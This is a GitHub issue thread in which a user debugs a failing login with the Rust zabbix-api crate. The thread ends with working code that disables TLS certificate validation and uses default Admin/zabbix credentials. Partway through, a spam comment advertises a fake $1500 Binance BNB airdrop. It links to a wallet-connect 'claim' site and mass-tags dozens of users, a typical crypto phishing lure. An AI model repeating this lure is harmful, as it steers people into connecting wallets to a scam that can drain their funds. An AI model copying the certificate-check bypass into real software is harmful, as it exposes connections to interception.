### ISSUE TITLE
login demo code in README.md has "unexpected error"

### ISSUE THREAD

**Issue by tjyang** [lebe-dev/zabbix-api-rs#1]
@lebe-dev 
Thanks for creating this framework, I am interested to learn use it.

- dir layout and create test01.
```
$ tree -L 2
.
├── Cargo.lock
├── Cargo.toml
└── src
    └── main.rs

1 directory, 3 files
$
$ cargo install --path . -f

```
- error message, I am expected to see error message saying that remote certificate not valid.
```
$ which test01
~/.cargo/bin/test01
$ test01
thread 'main' panicked at src/main.rs:15:9:
unexpected error
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
$
```
- Cargo.toml 
```
$ cat Cargo.toml
[package]
name = "test01"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
log = "0.4.20"
reqwest = { version = "0.11.23", features = ["blocking", "json"] }
zabbix-api = "0.1.0"
$
```
- main.rs with masked private info.
```
$ cat src/main.rs
use reqwest::blocking::Client;
use zabbix_api::client::v6::ZabbixApiV6Client;
use zabbix_api::client::ZabbixApiClient;
use log::error;

fn main() {
  let http_client = Client::new();

  let client = ZabbixApiV6Client::new(http_client, "https://zbbix03.test.com/zabbix/api_jsonrpc.php");

  match client.get_auth_session("Admin", "zabbix") {
    Ok(session) => println!("session: {session}"),
    Err(e) => {
        error!("error: {}", e);
        panic!("unexpected error")
    }
  }
$

```
- user curl to verify login
```
$ more  ~/zbxc-login.sh
curl --request POST \
     --insecure \
     --url 'https://zabbix03.test.com/zabbix/api_jsonrpc.php' \
     --header 'Content-Type: application/json-rpc' \
     --data '{"jsonrpc":"2.0","method":"user.login","params":{"username":"Admin","password":"zabbix"},"id":1}'
echo
$

``` 
- remote zabbix was able return bearer string after using --insecure to ignore certificate check
```
$  ~/zbxc-login.sh
{"jsonrpc":"2.0","result":"6b47c2a57d09b187f511d40369xxxxxx","id":1}
$

```

**Comment by lebe-dev** [comment]
Hello, thanks for report. Replace:

```rust
error!("error: {}", e);
```

with:

```rust
println!("error: {}", e);
````

And send output here.

**Comment by tjyang** [comment]
- better now, I can see it was due to network error.
```
$ test01
error: network error
thread 'main' panicked at src/main.rs:18:9:
unexpected error
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
$

```
- I am guessing it was due to check of remote server certificate invalided issue.
```
curl --request POST \
     --insecure \
     --url 'https://zabbix03.test.com/zabbix/api_jsonrpc.php' \
     --header 'Content-Type: application/json-rpc' \
     --data '{"jsonrpc":"2.0","method":"user.login","params":{"username":"Admin","password":"zabbix"},"id":1}'
echo
```
- See R1, Can you add  arg/setting like curl's --insecure to skip certificate check ? 

R1: https://github.com/seanmonstar/reqwest/issues/182

**Comment by lebe-dev** [comment]
You can build http client in such way:

```rust
let http_client = ClientBuilder::new().danger_accept_invalid_certs(true).build()
```

Then use in `ZabbixApiV6Client::new(...)`.

**Comment by tjyang** [comment]
- code modified, not sure how to call ZabbixApiV6Clien ::new now that diffrent crate used.
```

//use reqwest::blocking::Client;
use reqwest::ClientBuilder;
use zabbix_api::client::v6::ZabbixApiV6Client;
use zabbix_api::client::ZabbixApiClient;


fn main() {
//  let http_client = Client::new();
  let http_client = ClientBuilder::new().danger_accept_invalid_certs(true).build();

    let client = ZabbixApiV6Client::new(http_client, "https://1.1.1.1/zabbix/api_jsonrpc.php");
  match client.get_auth_session("Admin", "zabbix") {
    Ok(session) => println!("session: {session}"),
    Err(e) => {
        //error!("error: {}", e);
        println!("error: {}", e);
        panic!("unexpected error")
    }
  }
}


```
- error message
```
$ cargo build
<snipped>
   Compiling reqwest v0.11.23
   Compiling zabbix-api v0.1.0
   Compiling test01 v0.1.0 (xxxx/zbxc)
error[E0308]: mismatched types
  --> src/main.rs:12:41
   |
12 |     let client = ZabbixApiV6Client::new(http_client, "https://100.64.5.212/zabbix/api_jsonrpc.php");
   |                  ---------------------- ^^^^^^^^^^^ expected `Client`, found `Result<Client, Error>`
   |                  |
   |                  arguments to this function are incorrect
   |
   = note: expected struct `reqwest::blocking::Client`
                found enum `Result<reqwest::Client, reqwest::Error>`
note: associated function defined here
  --> /home/me/.cargo/registry/src/index.crates.io-6f17d22bba15001f/zabbix-api-0.1.0/src/client/v6/mod.rs:29:12
   |
29 |     pub fn new(client: Client, api_endpoint_url: &str) -> ZabbixApiV6Client {
   |            ^^^

For more information about this error, try `rustc --explain E0308`.
error: could not compile `test01` (bin "test01") due to previous error
error: failed to compile `test01 v0.1.0 (/home/me/locos/zbxc)`, intermediate artifacts can be found at `/home/me/locos/zbxc/target`.
To reuse those artifacts with a future compilation, set the environment variable `CARGO_TARGET_DIR` to that path.
make: *** [Makefile:108: install] Error 101
$


```

**Comment by Jehovani05** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @shamemezahid, @leopku, @lljgithub, @hiki-dev, @mauryaland, @NightWng120, @rameshvr, @mcjt, @luisbraganca, @Platekun, @xuhdev, @JHooks999, @zrobit, @DEEPANRAJS07, @Tharusha-dev, @snowyu, @siltwood, @ondrastech82, @raftario, @vinesoul, @maharjanaman, @Namerlight, @CroMarmot, @krishpop, @Imthiyaz-Ali, @Jyny, @olliec272, @jeekchen, @raphaklaus, @yuguojiang, @rozsival, @bxpana, @mengbinhao, @dbl520, @zen0bit, @RenegadeRed, @azapater, @durdenx, @DatouHsu, @andrewcking, @kutepoyzon, @sos0, @Devon-Crawford, @sinsinpub, @poojasain856, @Hardikag17, @NebuXIII, @smanwarulislam, @JiaqiXiang-nb, @tjddbc

**Comment by tjyang** [comment]
@lebe-dev , can you pls delete above spam ?

**Comment by lebe-dev** [comment]
ClientBulder's build method returns Result<Client, Error>, not Client. So, you have to handle this or use .unwrap().

**Comment by tjyang** [comment]
- Now it say expected `reqwest::blocking::Client`
![image](https://github.com/lebe-dev/zabbix-api-rs/assets/378638/4420e6d3-f28d-4f76-a3fe-cde1f22ba90f)

**Comment by lebe-dev** [comment]
You should use another ClientBuilder -> `reqwest::blocking::ClientBuilder`.

My crate doesn't support asynchronous code.

**Comment by tjyang** [comment]
@lebe-dev
Thanks for the guidance  along the way.  it is time for me to use vscode/rust  and really understand the rust code in details.

- working output
```
$ test01
session: 28204658b7fb741ff3e91bade6c2fb55
$ 
```
- change 1.1.1.1 to actual IP. 
```
use reqwest;
use std::time::Duration;
use zabbix_api::client::v6::ZabbixApiV6Client;
use zabbix_api::client::ZabbixApiClient;
fn main() {
    let http_client = reqwest::blocking::Client::builder()
        .timeout(Duration::from_secs(10))
        .danger_accept_invalid_certs(true)
        .build();
    let client = ZabbixApiV6Client::new(
        http_client.unwrap(),
        "https://1.1.1.1/zabbix/api_jsonrpc.php",
    );
    match client.get_auth_session("Admin", "zabbix") {
        Ok(session) => println!("session: {session}"),
        Err(e) => {
            println!("error: {}", e);
            panic!("unexpected error")
        }
    }
}
```
